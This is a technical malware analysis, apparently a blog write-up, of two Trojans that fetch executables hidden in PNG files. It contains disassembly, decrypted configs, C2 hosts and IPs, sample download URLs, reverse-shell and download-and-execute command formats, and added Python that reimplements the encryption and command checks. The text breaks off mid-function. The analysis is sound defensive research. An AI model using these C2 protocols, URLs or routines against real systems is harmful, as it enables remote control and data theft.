  • Recently I analyzed two malicious samples that were embedded within PNG files.  You can read the analysis of sample 1 here, and sample 2 here.
  • Today, I will analyze the Trojan responsible for downloading and executing these types of PNG files.
  • Here are the file characteristics:

File Name:  AcroRD32.exe
File Size:  20314 bytes
MD5:        1efc0c20b0445bc081890f16f59e672b
SHA1:       0adc179005e7ab3ed689d8959b30b31d1c93364e
PE Time:    0x4A8C97A7 [Thu Aug 20 00:24:07 2009 UTC]
Sections (3):
Name      Entropy  MD5
.text     6.1      4df2c1872cc098b1a72f80a286ecd425
.rdata    5.32     965c9f94db972dea96f4983b84d4a56c
.data     2.68     6254ecff135f9556b7ba9952f26188df

  • Let’s start our analysis by opening this file using PE Explorer:


  • PE Explorer tells us, among other things, that we have an extra 3418 bytes at the end of this file starting at file-offset 0x4200.
  • If we open our file with WinHex and go to offset 0x4200, we see that the data is obfuscated:
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F
000041E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
000041F0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00004200   1B 34 5E 2D F6 FC 06 46  0C 7F 5B 02 4A 16 E0 F1    4^-öü F [ J àñ
00004210   1D CF 8E CD 42 0D 00 00  00 80 30 10 C7 E0 17 59    ÏŽÍB    €0 Çà Y
00004220   BC CB FC 0F 66 48 A0 5D  BC CB FC 0F 66 48 A0 5D   ¼Ëü fH ]¼Ëü fH ]
00004230   BC CB FC 0F 66 48 A0 5D  BC CB FC 0F 66 48 A0 5D   ¼Ëü fH ]¼Ëü fH ]
00004240   C0 09 92 F4 57 79 BC 6B  FE 67 E4 0D 50 7E 99 CC   À 'ôWy¼kþgä P~™Ì
00004250   A9 EA 89 80 9C 59 25 3F  17 55 DA 7B 64 32 23 43   ©ê‰€œY%? UÚ{d2#C
00004260   44 C4 41 58 31 0C FD AC  28 A9 57 5B A6 F5 2A D6   DÄAX1 ý¬(©W[¦õ*Ö
00004270   F3 23 38 48 18 56 93 C4  87 BD 27 C6 73 18 1C E6   ó#8H V"ć½'Æs  æ
00004280   B1 A0 B8 2B DE 44 4C 0A  37 4B 00 F5 BA 15 37 FA   ± ¸+ÞDL 7K õº 7ú
00004290   6F 81 2A 45 82 39 D3 4B  CD BA A2 36 7C DC 8E 9F   o*E‚9ÓKͺ¢6|ÜŽŸ
000042A0   64 4A 11 F0 41 90 BC 7C  BC CB FC 0F 66 48 A0 5D   dJ ðA¼|¼Ëü fH ]
000042B0   BC CB FC 0F 66 48 A0 5D  C4 17 A5 6E 4B 65 89 B5   ¼Ëü fH ]Ä ¥nKe‰µ
000042C0   BC CB FC 0F 66 48 A0 5D  BC CB FC 0F 66 48 A0 5D   ¼Ëü fH ]¼Ëü fH ]
000042D0   BC CB FC 0F 66 48 A0 5D  9E 87 D8 10 62 59 A5 B6   ¼Ëü fH ]ž‡Ø bY¥¶
000042E0   08 76 B4 5D 14 7D A9 3F  95 E2 A4 3B 35 A8 5A F1    v´] }©?•â¤;5¨Zñ
  • The Trojan opens a file handle to itself, and then reads the file 4 bytes at a time looking for this sequence of bytes: 0x1B345E2D (this matches the first four bytes of our obfuscated data).
0040106F  |> /56            /PUSH ESI                       ; /stream
00401070  |. |6A 04         |PUSH 4                         ; |n = 4
00401072  |. |8D45 08       |LEA EAX, DWORD PTR SS:[EBP+8]  ; |
00401075  |. |6A 01         |PUSH 1                         ; |size = 1
00401077  |. |50            |PUSH EAX                       ; |ptr
00401078  |. |E8 BB2C0000   |CALL <JMP.&MSVCRT.fread>       ; \fread
0040107D  |. |83C4 10       |ADD ESP, 10
00401080  |. |807D 08 1B    |CMP BYTE PTR SS:[EBP+8], 1B
00401084  |. |75 12         |JNZ SHORT AcroRD32.00401098
00401086  |. |807D 09 34    |CMP BYTE PTR SS:[EBP+9], 34
0040108A  |. |75 0C         |JNZ SHORT AcroRD32.00401098
0040108C  |. |807D 0A 5E    |CMP BYTE PTR SS:[EBP+A], 5E
00401090  |. |75 06         |JNZ SHORT AcroRD32.00401098
00401092  |. |807D 0B 2D    |CMP BYTE PTR SS:[EBP+B], 2D
00401096  |. |74 08         |JE SHORT AcroRD32.004010A0
00401098  |> |F646 0C 10    |TEST BYTE PTR DS:[ESI+C], 10
0040109C  |. |75 73         |JNZ SHORT AcroRD32.00401111
0040109E  |.^\EB CF         \JMP SHORT AcroRD32.0040106F

  • The Trojan then reads the next 16 bytes into a buffer (0xF6FC06460C7F5B024A16E0F11DCF8ECD)
  • The next DWORD (0x420D0000) specifies the length of the data that follows (minus the last two bytes).
  • These 0xD42 bytes of data are then decrypted using a form of 3DES-ECB with the 16-byte key. The DES algorithm does not appear to be the standard one (I tried CrypTool with no success). However, the algorithm must be using ECB mode, because the data contains repeating 8-byte patterns.
  • The decrypted data appears to contain configuration information and is partially shown below:
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   66 72 65 65 00 00 00 00  00 00 00 00 00 00 00 00   free           
00000010   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000020   00 00 00 00 00 00 00 00  3A 00 00 00 20 00 00 00           :      
00000030   5C 00 00 00 2F 00 00 00  3C 21 2D 2D 20 00 00 00   \   /   <!--   
00000040   20 2D 2D 3E 00 00 00 00  25 73 20 25 73 00 00 00    -->    %s %s  
00000050   54 45 4D 50 00 00 00 00  54 4D 50 00 00 00 00 00   TEMP    TMP    
00000060   53 4F 46 54 57 41 52 45  5C 4D 49 43 52 4F 53 4F   SOFTWARE\MICROSO
00000070   46 54 5C 57 49 4E 44 4F  57 53 5C 43 55 52 52 45   FT\WINDOWS\CURRE
00000080   4E 54 56 45 52 53 49 4F  4E 5C 52 55 4E 00 00 00   NTVERSION\RUN  
00000090   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000A0   41 63 72 6F 72 65 61 64  00 00 00 00 00 00 00 00   Acroread       
000000B0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
000000C0   02 00 00 80 65 78 70 6C  6F 72 65 72 2E 65 78 65      €explorer.exe
000000D0   00 00 00 00 41 63 72 6F  52 44 33 32 2E 65 78 65       AcroRD32.exe
000000E0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
                      *
                      *
                      *
000004C0   12 00 00 00 02 00 00 00  02 00 00 00 65 78 69 74               exit
000004D0   00 00 00 00 63 64 20 00  3E 00 00 00 68 74 74 70       cd  >   http
000004E0   3A 2F 2F 00 2A 2F 2A 00  00 00 00 00 57 69 6E 64   :// */*     Wind
000004F0   6F 77 73 2B 4E 54 2B 35  2E 31 00 00 77 77 77 2E   ows+NT+5.1  www.
00000500   6D 75 63 6B 6C 65 73 68  6F 6F 74 2E 6E 73 6E 2E   muckleshoot.nsn.
00000510   75 73 00 00 00 00 00 00  00 00 00 00 00 00 00 00   us             
00000520   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000530   00 00 00 00 00 00 00 00  00 00 00 00 2F 69 6E 64               /ind
00000540   65 78 2E 68 74 6D 00 00  00 00 00 00 00 00 00 00   ex.htm         
00000550   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000560   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000570   00 00 00 00 00 00 00 00  00 00 00 00 44 65 66 57               DefW
00000580   61 74 63 68 2E 65 78 65  00 00 00 00 00 00 00 00   atch.exe       
00000590   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
                          *
                          *
                          *
00000BE0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 63 64                 cd
00000BF0   00 00 00 00 00 00 00 00  00 00 00 00 00 00 74 69                 ti
00000C00   6D 65 00 00 00 00 73 72  61 6E 64 00 00 00 72 61   me    srand   ra
00000C10   6E 64 00 00 00 00 5F 66  74 69 6D 65 00 00 61 74   nd    _ftime  at
00000C20   6F 66 00 00 00 00 61 74  6F 6C 00 00 00 00 61 74   of    atol    at
00000C30   6F 69 00 00 00 00 5F 69  74 6F 61 00 00 00 6C 73   oi    _itoa   ls
00000C40   74 72 6C 65 6E 41 00 00  00 00 00 00 00 00 6C 73   trlenA        ls
00000C50   74 72 63 70 79 41 00 00  00 00 00 00 00 00 6C 73   trcpyA        ls
00000C60   74 72 63 61 74 41 00 00  00 00 00 00 00 00 6C 73   trcatA        ls
00000C70   74 72 63 70 79 6E 41 00  00 00 00 00 00 00 6C 73   trcpynA       ls
00000C80   74 72 63 6D 70 69 41 00  00 00 00 00 00 00 73 74   trcmpiA       st
00000C90   72 73 74 72 00 00 00 00  00 00 00 00 00 00 73 73   rstr          ss
00000CA0   63 61 6E 66 00 00 00 00  00 00 00 00 00 00 73 70   canf          sp
00000CB0   72 69 6E 74 66 00 00 00  00 00 00 00 00 00 5F 73   rintf         _s
00000CC0   74 72 6E 69 63 6D 70 00  00 00 00 00 00 00 73 74   trnicmp       st
00000CD0   72 6E 63 61 74 00 00 00  00 00 00 00 00 00 21 40   rncat         !@
00000CE0   23 64 6D 63 23 40 21 00  00 00 00 00 00 00 21 40   #dmc#@!       !@
00000CF0   23 74 69 75 71 23 40 21  00 00 00 00 00 00 21 40   #tiuq#@!      !@
00000D00   23 74 72 6F 70 70 75 73  6E 75 23 40 21 00 63 6D   #troppusnu#@! cm
00000D10   64 2E 65 78 65 20 2F 63  20 00 00 00 00 00 00 00   d.exe /c       
00000D20   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000D30   00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00                  
00000D40   4E 57                                              NW
  • The Trojan then creates a mutex named “free”, and sets the HIDDEN file attribute on the file.
  • If not running from this location the Trojan copies itself to:

C:\Documents and Settings\username\Local Settings\Temp\AcroRD32.exe

  • It then deletes itself (if not running from the path above) and executes the file from the path above.
  • The Trojan entrenches itself under:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      • Acroread = C:\Documents and Settings\username\Local Settings\Temp\AcroRD32.exe
  • The Trojan then sends this type of GET request:
GET /index.htm HTTP/1.1
User-Agent: Windows+NT+5.1
Host: www.muckleshoot.nsn.us
Cache-Control: no-cache
  • The content of index.htm is parsed for the HTML comment tag:
<!--...-->
  • The data contained in this HTML comment tag is Base64 decoded using the standard alphabet (sub. 0x0040311C)
  • The first two bytes of the decoded data are expected to be: ug
004030ED      |.  803F 75            CMP BYTE PTR DS:[EDI], 75
004030F0      |.  75 21              JNZ SHORT AcroRD32.00403113
004030F2      |.  80BE 39030000 67   CMP BYTE PTR DS:[ESI+339], 67
004030F9      |.  75 18              JNZ SHORT AcroRD32.00403113
  • The data following the two bytes ug instructs the Trojan what to do next. The valid options are shown below:
D or d:  Download an executable file embedded in a PNG file.
         Example: ugdbad.png
E or e:  Download and execute an executable file embedded in a PNG file.
         Example: ugebad.png
L or l:  Download and load a DLL file embedded in a PNG file.
         Example: uglbadDLL.png
Q or q:  Quit this session
R or r:  Reverse shell access to a specified IP/port
         Example: ugr11.22.33.44 666
S or s:  Set sleep time.
  • When this Trojan is instructed to provide shell access to an IP address, it starts the communication by sending the 16 byte 3DES key followed by a NULL DWORD:
00000000  f6 fc 06 46 0c 7f 5b 02  4a 16 e0 f1 1d cf 8e cd ...F..[. J.......
00000010  00 00 00 00                                      ....
  • The remote IP is expected to send the command: !@#dmc#@!
  • As you can see, the command is cmd in reverse.
  • The Trojan uses a different type of encryption for this communication. The encryption algorithm is shown below:
004037C6    .  56             PUSH ESI                    
004037C7    .  8B7424 08      MOV ESI, DWORD PTR SS:[ESP+8]
004037CB    .  57             PUSH EDI
004037CC    .  6A 01          PUSH 1
004037CE    .  8A06           MOV AL, BYTE PTR DS:[ESI]
004037D0    .  5F             POP EDI
004037D1    .  8AC8           MOV CL, AL
004037D3    .  C0E1 03        SHL CL, 3
004037D6    .  C0E8 05        SHR AL, 5
004037D9    .  0AC8           OR CL, AL
004037DB    .  324C24 10      XOR CL, BYTE PTR SS:[ESP+10]    ; XOR with 0xFC
004037DF    .  397C24 14      CMP DWORD PTR SS:[ESP+14], EDI
004037E3    .  880E           MOV BYTE PTR DS:[ESI], CL
004037E5    .  76 21          JBE SHORT AcroRD32.00403808
004037E7    >  8A1437         MOV DL, BYTE PTR DS:[EDI+ESI]
004037EA    .  8D0437         LEA EAX, DWORD PTR DS:[EDI+ESI]
004037ED    .  8ACA           MOV CL, DL
004037EF    .  C0E1 03        SHL CL, 3
004037F2    .  C0EA 05        SHR DL, 5
004037F5    .  0ACA           OR CL, DL
004037F7    .  8808           MOV BYTE PTR DS:[EAX], CL
004037F9    .  8A5437 FF      MOV DL, BYTE PTR DS:[EDI+ESI-1]
004037FD    .  32D1           XOR DL, CL
004037FF    .  47             INC EDI
00403800    .  3B7C24 14      CMP EDI, DWORD PTR SS:[ESP+14]
00403804    .  8810           MOV BYTE PTR DS:[EAX], DL
00403806    .^ 72 DF          JB SHORT AcroRD32.004037E7
00403808    >  5F             POP EDI
00403809    .  5E             POP ESI
0040380A    .  C2 0C00        RETN 0
  • This algorithm can be expressed as follows. For each byte of plain text (p), the encrypted byte (e) is:
    • a = p << 3
    • b = p >> 5
    • c = a | b   (i.e. p rotated left by 3 bits, kept to 8 bits)
    • e = c ^ previous encrypted byte
  • For the first byte there is no previous encrypted byte, so the routine XORs c with 0xFC instead (the value passed in [ESP+10]).
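The shell cipher from the listing above re-expressed in Python, as an added example (not code from the Trojan or the post): encrypt() follows the routine byte for byte, and decrypt() is the inverse, which the post leaves implicit.

```python
"""AcroRD32.exe reverse-shell cipher: rotate-left-3 then XOR with the previous
ciphertext byte, seeded with 0xFC for the first byte."""

FIRST_XOR = 0xFC   # value the routine receives in [ESP+10] for byte 0


def rotl3(b: int) -> int:
    """(b << 3) | (b >> 5) on an 8-bit value: SHL CL,3 / SHR AL,5 / OR CL,AL."""
    return ((b << 3) | (b >> 5)) & 0xFF


def rotr3(b: int) -> int:
    """Inverse of rotl3."""
    return ((b >> 3) | (b << 5)) & 0xFF


def encrypt(plain: bytes, seed: int = FIRST_XOR) -> bytes:
    out = bytearray()
    prev = seed
    for p in plain:
        e = rotl3(p) ^ prev      # chained on the already-encrypted previous byte
        out.append(e)
        prev = e
    return bytes(out)


def decrypt(cipher: bytes, seed: int = FIRST_XOR) -> bytes:
    """Undo the chain: each plaintext byte depends only on e[i] and e[i-1], so a
    corrupted ciphertext byte damages at most two plaintext bytes."""
    out = bytearray()
    prev = seed
    for e in cipher:
        out.append(rotr3(e ^ prev))
        prev = e
    return bytes(out)


if __name__ == "__main__":
    # The C2 side's expected command, as quoted in the post.
    handshake = b"!@#dmc#@!"
    print(encrypt(handshake).hex())
    print(decrypt(encrypt(handshake)))
```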
  • When a PNG file containing an executable file is downloaded, the Trojan looks for the zTXt chunk of the PNG file.
  • Typically this chunk contains compressed textual data; if its data is not valid, however, image viewers silently ignore it.
  • The embedded executable is obfuscated within the PNG file by being XOR-ed with 0xFF (inverted bits).
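A triage helper for the PNG carrier described above, added as an example (not the author's tool): it walks the PNG chunk list, checks each chunk's CRC, and for every zTXt chunk inverts the bytes and looks for a PE header. The carrier PNG below is constructed inline; the keyword prefix in the zTXt chunk is an assumption about layout, which is why the scan searches the whole inverted chunk instead of assuming an offset.

```python
"""Find an executable hidden (XOR 0xFF) inside a PNG zTXt chunk."""
import struct
import zlib
from typing import Iterator, Optional, Tuple

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def iter_chunks(data: bytes) -> Iterator[Tuple[bytes, bytes]]:
    """Yield (type, payload) for each chunk; validates the signature and CRCs."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if len(data) < pos + 12 + length:
            raise ValueError(f"truncated chunk at offset {pos}")
        payload = data[pos + 8:pos + 8 + length]
        crc = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])[0]
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC on {ctype!r} chunk at offset {pos}")
        yield ctype, payload
        pos += 12 + length
        if ctype == b"IEND":
            break


def carve_ztxt_payload(png: bytes) -> Optional[Tuple[int, int, bytes]]:
    """Return (chunk_index, offset_in_chunk, carved_bytes) for the first zTXt chunk
    whose inverted content holds an MZ header with a valid e_lfanew -> 'PE\\0\\0'."""
    for idx, (ctype, payload) in enumerate(iter_chunks(png)):
        if ctype != b"zTXt":
            continue
        inverted = bytes(b ^ 0xFF for b in payload)
        mz = inverted.find(b"MZ")
        while mz != -1:
            if mz + 0x40 <= len(inverted):
                e_lfanew = struct.unpack_from("<I", inverted, mz + 0x3C)[0]
                if inverted[mz + e_lfanew:mz + e_lfanew + 4] == b"PE\0\0":
                    return idx, mz, inverted[mz:]
            mz = inverted.find(b"MZ", mz + 1)
    return None


def _chunk(ctype: bytes, payload: bytes) -> bytes:
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)


def fake_pe(size: int = 0x80) -> bytes:
    """Constructed stand-in for an executable: MZ stub whose e_lfanew points at 'PE\\0\\0'."""
    hdr = bytearray(size)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr)


def build_sample_png(embedded: Optional[bytes]) -> bytes:
    """Constructed 1x1 carrier image. If `embedded` is given, a zTXt chunk is added
    whose data is a keyword/NUL/method prefix (assumed layout) followed by the
    inverted executable; the 'compressed' field is therefore not valid zlib."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00\x00\x00")     # one filter byte + one RGB pixel
    png = PNG_SIG + _chunk(b"IHDR", ihdr)
    if embedded is not None:
        png += _chunk(b"zTXt", b"Comment\x00\x00" + bytes(b ^ 0xFF for b in embedded))
    return png + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


if __name__ == "__main__":
    hit = carve_ztxt_payload(build_sample_png(fake_pe()))
    print(hit[:2] if hit else "no embedded PE")
```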

Malware obfuscated within PNG files > Sample 2

  • Today I will take a look at another type of Trojan that was found embedded within a PNG file.
  • Please refer to the analysis of the first sample for some background information on the technique used to embed this executable within the PNG file.
  • There are actually two samples that are still hosted (as of the day of this post) at these two URLs:
http://aimscomputersystems.com/hello.png
File Name: hello.png
File Size: 225962 bytes
MD5: 06c6d543258bd5235a84424d426ca3f3
SHA1: 30fddeb69b51cc714c91ab8db7f49bdda3ebdc2c

and

http://aimscomputersystems.com/demo.png
File Name: demo.png
File Size: 197217 bytes
MD5: 6e86d893d7115d312bff73556b4fe0df
SHA1: b63c8176068adbbab003887d573bfbd8ca3baf3d
  • The two executable files that were carved out of these two PNG files have the following characteristics:
File Name:  demo.exe
File Size:  151552 bytes
MD5:        7712d05c8b499fc7a1f4a6a6b6dee825
SHA1:       57c50ca6fd6356218541dd27bee4dd0595ade842
PE Time:    0x4B85C931 [Thu Feb 25 00:49:53 2010 UTC]
PEID Sig:   Microsoft Visual C++ 8
AV:         0/41 (0%) [VirusTotal]
Sections (4):
 Name      Entropy  MD5
 .text     6.64     2262823997e50080fb875f41a6cfa0be
 .rdata    5.12     5b508d30bce73c03449aefedca19e780
 .data     3.76     f92d22b50b4cef6e623a47f2bc03b62c
 .rsrc     5.11     3a4fdc31bb49b29d6f19b94641d14ee8
  • File demo.exe is a variant of Trojan.PingBed, whose behavior is identical to the analysis of Sample 1. So, this file will not be covered any further in this post.
  • The second executable has the following characteristics:
File Name:  hello.exe
File Size:  187392 bytes
MD5:        692cb0fca66738055396e1e1c8f0d52c
SHA1:       d7cdfb5c8319dd540a403ccde420e8c920549953
PE Time:    0x4C289FAE [Mon Jun 28 13:12:14 2010 UTC]
PEID Sig:   Microsoft Visual C++ 8
AV:         11/43 (25.6%) [VirusTotal]
Sections (4):
 Name      Entropy  MD5
 .text     6.68     b6647b71561a4a43a3463351cc24eb52
 .rdata    5.48     64274308f04ba9a10bd31a523354b7de
 .data     3.24     648da42fc5f7efd2302a417cefd521c0
 .rsrc     7.83     588d099c11b1e2b2a3395f1cf1f68fee

ANALYSIS OF hello.exe

  • This Trojan, which I will name Trojan.NTESSESS, communicates with IP address 69.39.133.114 over TCP port 443, and actually uses SSL.
  • Therefore, everything that follows would be encrypted by the SSL session key.
  • It sends the following GET request:
GET /6K8gL8.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Cache-Control: no-cache
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 69.39.133.114
Connection: Keep-Alive
Cookie: NTESSESS=s9st0hzccBi; CONNECTID=01081318220
  • The string NTESSESS is hard coded in the binary file.
  • The string s9st0hzccBi is also hard coded in the binary file.
  • The number following the CONNECTID is an 11 digit decimal representation of the victim’s volume serial number, and it is probably meant to uniquely identify this victim to the C2 node.

COMMAND STRUCTURE

  • The data received from the C2 node is expected to be Base64 encoded.  It will have the following structure:
    • Bytes 0 – 134 appear to be irrelevant as they are not checked.
    • Bytes 135 + 137 + 139 + 141 are expected to sum to 0x7B (8-bit addition, so the sum wraps modulo 256).
    • Bytes 136 + 138 + 140 + 142 are expected to sum to 0xFA (likewise modulo 256).
    • Bytes 143 – 146 can be NULL.
    • Byte 147 is where the command is expected to be.
    • The rest of the bytes vary depending on which command is used.
  • Here is the code that performs the math on bytes 135 – 142 (EAX points to byte 135 at this point):
004020F0  /$  8B4424 04     MOV EAX, DWORD PTR SS:[ESP+4]
004020F4  |.  8A48 06       MOV CL, BYTE PTR DS:[EAX+6]
004020F7  |.  0248 04       ADD CL, BYTE PTR DS:[EAX+4]
004020FA  |.  0248 02       ADD CL, BYTE PTR DS:[EAX+2]
004020FD  |.  0208          ADD CL, BYTE PTR DS:[EAX]
004020FF  |.  80F9 7B       CMP CL, 7B
00402102  |.  75 17         JNZ SHORT hello.0040211B
00402104  |.  8A50 07       MOV DL, BYTE PTR DS:[EAX+7]
00402107  |.  0250 05       ADD DL, BYTE PTR DS:[EAX+5]
0040210A  |.  0250 03       ADD DL, BYTE PTR DS:[EAX+3]
0040210D  |.  0250 01       ADD DL, BYTE PTR DS:[EAX+1]
00402110  |.  80FA FA       CMP DL, 0FA
00402113  |.  75 06         JNZ SHORT hello.0040211B
00402115  |.  B8 01000000   MOV EAX, 1
0040211A  |.  C3            RETN
0040211B  |>  33C0          XOR EAX, EAX
0040211D  \.  C3            RETN
  • Byte 147 is dispatched through a jump table.  The bounds check at 004026D6 accepts values from 0x64 up to 0xBE (0x64 + 0x5A); the byte table at 0x402938 maps each accepted value to a handler index, the recognised commands lie in the range 0x64 – 0xAB, and anything else lands in the default case at 004028E5:
004026CD  |.  83C4 10            ADD ESP, 10
004026D0  |>  8B43 0C            MOV EAX, DWORD PTR DS:[EBX+C]
004026D3  |.  8D48 9C            LEA ECX, DWORD PTR DS:[EAX-64]           ;  Switch (cases 64..AB)
004026D6  |.  83F9 5A            CMP ECX, 5A
004026D9  |.  0F87 06020000      JA hello.004028E5
004026DF  |.  0FB689 38294000    MOVZX ECX, BYTE PTR DS:[ECX+402938]
004026E6  |.  FF248D 00294000    JMP DWORD PTR DS:[ECX*4+402900]
  • Here is a list of the commands that this Trojan supports:
0x64  - Reverse Shell
0x66  - Execute a file
0x67  - Write to a file
0x69  - Execute via the shell
0x6B  - Set sleep time (in hours)
0x6C  - Set sleep time (in seconds)
0xA0  - Upload a file (from victim to C2 node)
0xA3  - Download a file (from C2 node to victim)
0xA6  - Download URL to file
0xAA  - Process List
0xAB  - Kill a process
  • The Trojan encrypts the results of the commands by XOR-ing the data with a 9 byte key that changes with each transmission.
  • The following describes how you can derive this 9 byte XOR key:
    • Below is a sample reply from the Trojan to the C2 node (only the tail end of the HTTP request is shown):
      • The dump shows the end of the multipart/form-data POST body (boundary and Content-Disposition lines), followed by a 24 byte header and the beginning of the process list command results (starting with 0x35DDA18E…).
      • To derive the 9 byte key we focus on the 24 byte header (0x230D2A1F … 0xF2020000, at offsets 0x58 – 0x6F).  Note that the DWORD at offset 12 of this header is 0x000000AA, the Process List command code.
      • Take the byte at offset 20 of the header (0xF2) followed by its first eight bytes (0x230D2A1F0E0F20BF), and XOR each of those nine bytes with the byte at offset 8 (0xF7).  This gives the key 0x05D4FADDE8F9F8D748.
      • This key, repeated, XOR-decrypts the data that follows the 24 byte header (0x35DDA18E…).  The first bytes come out as "0<TAB>[System Process]", i.e. the start of a tab-separated process list, which confirms the derivation.
Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

00000000   2D 2D 2D 2D 2D 2D 2D 2D  2D 2D 2D 2D 2D 2D 2D 2D   ----------------
00000010   2D 2D 2D 2D 2D 2D 2D 2D  2D 2D 2D 37 64 36 65 61   -----------7d6ea
00000020   32 64 34 30 35 66 63 0D  0A 43 6F 6E 74 65 6E 74   2d405fc  Content
00000030   2D 44 69 73 70 6F 73 69  74 69 6F 6E 3A 20 66 6F   -Disposition: fo
00000040   72 6D 2D 64 61 74 61 3B  20 6E 61 6D 65 3D 22 20   rm-data; name="
00000050   38 32 31 22 0D 0A 0D 0A  23 0D 2A 1F 0E 0F 20 BF   821"    # *    ¿
00000060   F7 10 00 00 AA 00 00 00  00 00 00 00 F2 02 00 00   ÷   ª       ò  
00000070   35 DD A1 8E 91 8A 8C B2  25 25 84 88 B2 8B 9C 8B   5Ý¡Ž‘ŠŒ²%%„ˆ²‹œ‹
00000080   A4 15 0F E0 F3 8E 91 8A  8C B2 25 0F E7 C2 ED E1   ¤  à󎑊Œ²% çÂíá
00000090   8A 95 A4 3B 2B B1 82 B8  E1 AA A1 84 1C 40 99 A6   Š•¤;+±‚¸áª¡„ @™¦
000000A0   93 BC D9 B9 82 1C 4D 9B  A8 94 BC A0 F2 E1 79 37   “¼Ù¹‚ M›¨”¼ òáy7
000000B0   DD 99 AE 9A 8A 8B F9 2D  7D B1 F3 8E B1 AA AC 92   Ý™®šŠ‹ù-}±óޱª¬’
000000C0   05 59 9A AE FD A9 AC AC  9F 07 57 9D AE 84 E2 CF    Yš®ý©¬¬Ÿ W®„âÏ
000000D0   CB E1 41 72 BD 94 B1 87  9E 97 B9 66 60 AC 9F D4   ËáAr½”±‡ž—¹f`¬ŸÔ
000000E0   BB A0 AB 83 0D 48 88 B4  89 C8 B8 AD 83 00 4A 86   » «ƒ Hˆ´‰È¸­ƒ J†
000000F0   B3 89 B1 F3 CE EF 78 0C  A7 9F AF 9E 90 9B B2 3B   ³‰±óÎïx §Ÿ¯ž›²;
00000100   2B B1 82 B8 E1 AA A1 84  1C 40 99 A6 93 BC D9 B9   +±‚¸áª¡„ @™¦“¼Ù¹
  • When command 0xA0 is called, the Trojan makes a call to URLDownloadToFile, so this is a separate connection to the C2 node over TCP port 80.  The data that is exfiltrated is not obfuscated in any way.  Note the User-Agent: URLDownloadToFile goes through urlmon/WinINet, which supplies the machine's own browser string rather than the MSIE 6.0 string seen on the main channel, so the two channels look like different clients on the wire.  The request looks something like this:
GET /XbUPTB.asp?ID=1349506 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET 4.0C; .NET4.0E)
Host: 69.39.133.114
Connection: Keep-Alive
Cookie: NTESSESS=s9st0hzccBi; CONNECTID=01081318220
  • When the reverse shell command (0x64) is called the following happens:
    • This Trojan comes with its own copy of cmd.exe embedded in the Trojan file (starting at file-offset 0x16104 of hello.exe).
    • When this Trojan provides reverse shell functionality to the C2 node, it extracts this copy of cmd.exe, saves it in the user's Temp folder (C:\DOCUME~1\username\LOCALS~1\Temp\nveda.exe), and then executes it.
    • File nveda.exe has the following characteristics:
File Name:  nveda.exe
File Size:  95232 bytes
MD5:        2ba4b3217335461e85ff54e1ee75c8b5
SHA1:       db488d5c044004c0bed2c5bf2563fd918ea76878
PE Time:    0x4188DA98 [Wed Nov 03 13:18:16 2004 UTC]
PEID Sig:   UPX 3.02
Sections (3):
Name      Entropy  MD5
UPX0      0.0      d41d8cd98f00b204e9800998ecf8427e
UPX1      7.99     9daa99bd65d283caca1a117ce4971d6c
.rsrc     3.03     345d2db10ab606cb5edff48efd14de50
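As an added example (my code, not the Trojan's and not from the original post), here is a Python re-implementation of the two pieces of the hello.exe protocol described above: the task check from sub_4020F0 together with the jump-table range, and the 9 byte reply key derivation applied to the bytes of the process-list reply dump. The task buffer is constructed for the example and assumes the byte offsets apply to the Base64-decoded task, which the page does not state outright; the reply bytes are copied from the dump at offsets 0x58 – 0x9F.

```python
import base64

# Command byte values and their purpose, as listed above.
HELLO_COMMANDS = {
    0x64: "Reverse Shell", 0x66: "Execute a file", 0x67: "Write to a file",
    0x69: "Execute via the shell", 0x6B: "Set sleep time (hours)",
    0x6C: "Set sleep time (seconds)", 0xA0: "Upload a file",
    0xA3: "Download a file", 0xA6: "Download URL to file",
    0xAA: "Process List", 0xAB: "Kill a process",
}

MAGIC_OFFSET = 135   # EAX on entry to sub_4020F0
CMD_OFFSET = 147


def magic_ok(buf: bytes, base: int = MAGIC_OFFSET) -> bool:
    """Re-implements sub_4020F0: two 8-bit sums (CL/DL wrap at 256) over
    alternating bytes must come out to 0x7B and 0xFA."""
    odd = (buf[base] + buf[base + 2] + buf[base + 4] + buf[base + 6]) & 0xFF
    even = (buf[base + 1] + buf[base + 3] + buf[base + 5] + buf[base + 7]) & 0xFF
    return odd == 0x7B and even == 0xFA


def parse_task(b64_task: bytes):
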